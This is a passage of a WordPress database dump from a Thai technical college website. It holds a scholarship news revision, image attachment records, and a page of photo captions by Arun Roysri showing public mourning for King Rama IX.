class=\"aligncenter wp-image-4305 size-full\" src=\"/wp-content/uploads/2018/11/9-11-2561-13-08-26.jpg\" alt=\"\" width=\"461\" height=\"638\" /></a>', 'วันพฤหัสบดีที่ ๘ พฤศจิกายน ๒๕๖๑ คุณนิพัทธ์ ล้ำเลิศลักษณชัย ผู้จัดการฝ่ายผลิต บริษัท เอสซีจี เคมิคอลส์ จำกัด เข้ามอบทุนการศึกษาให้แก่นักศึกษาในโครงการ Excellent Model School รุ่นที่ ๑ และ ๒ จำนวน ๓๘ ทุน ทุนละ ๑๐,๐๐๐ บาท รวมเป็นจำนวนเงินทุนการศึกษาทั้งสิ้น ๓๘๐,๐๐๐ บาท เพื่อเป็นการสนับสนุนการศึกษา ณ โดมหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4304-revision-v1', '', '', '2018-11-09 13:07:52', '2018-11-09 06:07:52', '', 4304, 'http://www.technicrayong.ac.th/4304-revision-v1/', 0, 'revision', '', 0),
(4309, 3, '2018-11-12 09:09:04', '2018-11-12 02:09:04', '', '9-11-2561 15-01-06', '', 'inherit', 'closed', 'closed', '', '9-11-2561-15-01-06', '', '', '2018-11-12 09:09:04', '2018-11-12 02:09:04', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/9-11-2561-15-01-06.jpg', 0, 'attachment', 'image/jpeg', 0),
(4313, 3, '2018-11-12 09:37:21', '2018-11-12 02:37:21', '', '2-Arun Roysri copy', '', 'inherit', 'closed', 'closed', '', '2-arun-roysri-copy', '', '', '2018-11-12 09:37:21', '2018-11-12 02:37:21', '', 3805, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/2-Arun-Roysri-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4314, 3, '2018-11-12 09:37:39', '2018-11-12 02:37:39', '', '3-Arun Roysri copy', '', 'inherit', 'closed', 'closed', '', '3-arun-roysri-copy', '', '', '2018-11-12 09:37:39', '2018-11-12 02:37:39', '', 3805, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/3-Arun-Roysri-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4315, 3, '2018-11-12 09:37:52', '2018-11-12 02:37:52', '', '4-Arun Roysri copy', '', 'inherit', 'closed', 'closed', '', '4-arun-roysri-copy', '', '', '2018-11-12 09:37:52', '2018-11-12 02:37:52', '', 3805, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/4-Arun-Roysri-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4316, 3, '2018-11-12 09:38:05', '2018-11-12 02:38:05', '', '12-Arun Roysri copy', '', 'inherit', 'closed', 'closed', '', '12-arun-roysri-copy', '', '', '2018-11-12 09:38:05', '2018-11-12 02:38:05', '', 3805, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/12-Arun-Roysri-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4317, 3, '2018-11-12 09:38:17', '2018-11-12 02:38:17', '', '17-Arun Roysri copy', '', 'inherit', 'closed', 'closed', '', '17-arun-roysri-copy', '', '', '2018-11-12 09:38:17', '2018-11-12 02:38:17', '', 3805, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/17-Arun-Roysri-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4318, 3, '2018-11-12 09:38:26', '2018-11-12 02:38:26', '', '21-Arun Roysri copy', '', 'inherit', 'closed', 'closed', '', '21-arun-roysri-copy', '', '', '2018-11-12 09:38:26', '2018-11-12 02:38:26', '', 3805, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/21-Arun-Roysri-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4319, 3, '2018-11-12 09:38:42', '2018-11-12 02:38:42', '', '23-Arun Roysri copy', '', 'inherit', 'closed', 'closed', '', '23-arun-roysri-copy', '', '', '2018-11-12 09:38:42', '2018-11-12 02:38:42', '', 3805, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/23-Arun-Roysri-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4320, 3, '2018-11-12 09:38:55', '2018-11-12 02:38:55', '', '24-Arun Roysri copy', '', 'inherit', 'closed', 'closed', '', '24-arun-roysri-copy', '', '', '2018-11-12 09:38:55', '2018-11-12 02:38:55', '', 3805, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/24-Arun-Roysri-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4321, 3, '2018-11-12 09:39:06', '2018-11-12 02:39:06', '', '27-Arun Roysri copy', '', 'inherit', 'closed', 'closed', '', '27-arun-roysri-copy', '', '', '2018-11-12 09:39:06', '2018-11-12 02:39:06', '', 3805, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/27-Arun-Roysri-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4322, 3, '2018-11-12 09:39:19', '2018-11-12 02:39:19', '', '32-Arun Roysri copy', '', 'inherit', 'closed', 'closed', '', '32-arun-roysri-copy', '', '', '2018-11-12 09:39:19', '2018-11-12 02:39:19', '', 3805, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/32-Arun-Roysri-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4323, 3, '2018-11-12 09:39:29', '2018-11-12 02:39:29', '', '37-Arun Roysri copy', '', 'inherit', 'closed', 'closed', '', '37-arun-roysri-copy', '', '', '2018-11-12 09:39:29', '2018-11-12 02:39:29', '', 3805, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/37-Arun-Roysri-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4324, 3, '2018-11-12 09:39:39', '2018-11-12 02:39:39', '', '38-Arun Roysri copy', '', 'inherit', 'closed', 'closed', '', '38-arun-roysri-copy', '', '', '2018-11-12 09:39:39', '2018-11-12 02:39:39', '', 3805, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/38-Arun-Roysri-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4325, 3, '2018-11-12 09:39:49', '2018-11-12 02:39:49', '', '42-Arun Roysri copy', '', 'inherit', 'closed', 'closed', '', '42-arun-roysri-copy', '', '', '2018-11-12 09:39:49', '2018-11-12 02:39:49', '', 3805, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/42-Arun-Roysri-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4326, 3, '2018-11-12 09:40:03', '2018-11-12 02:40:03', '', '43-Arun Roysri copy', '', 'inherit', 'closed', 'closed', '', '43-arun-roysri-copy', '', '', '2018-11-12 09:40:03', '2018-11-12 02:40:03', '', 3805, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/43-Arun-Roysri-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4327, 3, '2018-11-12 09:40:15', '2018-11-12 02:40:15', '', '54-Arun Roysri copy', '', 'inherit', 'closed', 'closed', '', '54-arun-roysri-copy', '', '', '2018-11-12 09:40:15', '2018-11-12 02:40:15', '', 3805, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/54-Arun-Roysri-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4328, 3, '2018-11-12 09:40:30', '2018-11-12 02:40:30', '', '55-Arun Roysri copy', '', 'inherit', 'closed', 'closed', '', '55-arun-roysri-copy', '', '', '2018-11-12 09:40:30', '2018-11-12 02:40:30', '', 3805, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/55-Arun-Roysri-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4329, 3, '2018-11-12 09:40:41', '2018-11-12 02:40:41', '', '57-Arun Roysri copy', '', 'inherit', 'closed', 'closed', '', '57-arun-roysri-copy', '', '', '2018-11-12 09:40:41', '2018-11-12 02:40:41', '', 3805, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/57-Arun-Roysri-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4330, 3, '2018-11-12 09:40:55', '2018-11-12 02:40:55', '', '59-Arun Roysri copy', '', 'inherit', 'closed', 'closed', '', '59-arun-roysri-copy', '', '', '2018-11-12 09:40:55', '2018-11-12 02:40:55', '', 3805, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/59-Arun-Roysri-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4331, 3, '2018-11-12 09:41:08', '2018-11-12 02:41:08', '', '62-Arun Roysri copy', '', 'inherit', 'closed', 'closed', '', '62-arun-roysri-copy', '', '', '2018-11-12 09:41:08', '2018-11-12 02:41:08', '', 3805, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/62-Arun-Roysri-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4332, 3, '2018-11-12 09:41:18', '2018-11-12 02:41:18', '', '64-Arun Roysri copy', '', 'inherit', 'closed', 'closed', '', '64-arun-roysri-copy', '', '', '2018-11-12 09:41:18', '2018-11-12 02:41:18', '', 3805, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/64-Arun-Roysri-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4333, 3, '2018-11-12 09:41:32', '2018-11-12 02:41:32', '', '70-Arun Roysri copy', '', 'inherit', 'closed', 'closed', '', '70-arun-roysri-copy', '', '', '2018-11-12 09:41:32', '2018-11-12 02:41:32', '', 3805, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/70-Arun-Roysri-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4334, 3, '2018-11-12 09:41:46', '2018-11-12 02:41:46', '', '72-Arun Roysri copy', '', 'inherit', 'closed', 'closed', '', '72-arun-roysri-copy', '', '', '2018-11-12 09:41:46', '2018-11-12 02:41:46', '', 3805, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/72-Arun-Roysri-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4335, 3, '2018-11-12 09:42:01', '2018-11-12 02:42:01', '', '73-Arun Roysri copy', '', 'inherit', 'closed', 'closed', '', '73-arun-roysri-copy', '', '', '2018-11-12 09:42:01', '2018-11-12 02:42:01', '', 3805, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/73-Arun-Roysri-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4336, 3, '2018-11-12 09:42:16', '2018-11-12 02:42:16', '', '74-Arun Roysri copy', '', 'inherit', 'closed', 'closed', '', '74-arun-roysri-copy', '', '', '2018-11-12 09:42:16', '2018-11-12 02:42:16', '', 3805, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/74-Arun-Roysri-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4337, 3, '2018-11-12 09:42:35', '2018-11-12 02:42:35', '', '76-Arun Roysri copy', '', 'inherit', 'closed', 'closed', '', '76-arun-roysri-copy', '', '', '2018-11-12 09:42:35', '2018-11-12 02:42:35', '', 3805, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/76-Arun-Roysri-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4338, 3, '2018-11-12 09:42:45', '2018-11-12 02:42:45', '', '77-Arun Roysri copy', '', 'inherit', 'closed', 'closed', '', '77-arun-roysri-copy', '', '', '2018-11-12 09:42:45', '2018-11-12 02:42:45', '', 3805, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/77-Arun-Roysri-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4339, 3, '2018-11-12 09:42:54', '2018-11-12 02:42:54', '', '81-Arun Roysri copy', '', 'inherit', 'closed', 'closed', '', '81-arun-roysri-copy', '', '', '2018-11-12 09:42:54', '2018-11-12 02:42:54', '', 3805, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/81-Arun-Roysri-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4340, 3, '2018-11-12 09:43:04', '2018-11-12 02:43:04', '', '91-Arun Roysri copy', '', 'inherit', 'closed', 'closed', '', '91-arun-roysri-copy', '', '', '2018-11-12 09:43:04', '2018-11-12 02:43:04', '', 3805, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/91-Arun-Roysri-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4341, 3, '2018-11-12 10:06:25', '2018-11-12 03:06:25', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"wp-image-4313 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"wp-image-4314 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"wp-image-4315 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เองเพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p style=\"text-align: center;\"><img class=\"wp-image-4316 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4317\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แต่งดํา ทั้งเมือง”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4318\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4322\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<img class=\"aligncenter size-large wp-image-4323\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4324\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4325\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" />ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<img class=\"aligncenter size-large wp-image-4327\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4328\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"เสียงประสานจากใจ\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4329\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4332\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n<img class=\"aligncenter size-large wp-image-4333\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4337\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4338\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4339\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4340\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'publish', 'closed', 'closed', '', '%e0%b8%a0%e0%b8%b2%e0%b8%9e%e0%b8%96%e0%b9%88%e0%b8%b2%e0%b8%a2-%e0%b9%82%e0%b8%94%e0%b8%a2-%e0%b8%ad%e0%b8%a3%e0%b8%b8%e0%b8%93-%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%a2%e0%b8%a8%e0%b8%a3%e0%b8%b5', '', '', '2018-11-12 15:21:34', '2018-11-12 08:21:34', '', 0, 'http://www.technicrayong.ac.th/?page_id=4341', 0, 'page', '', 0),
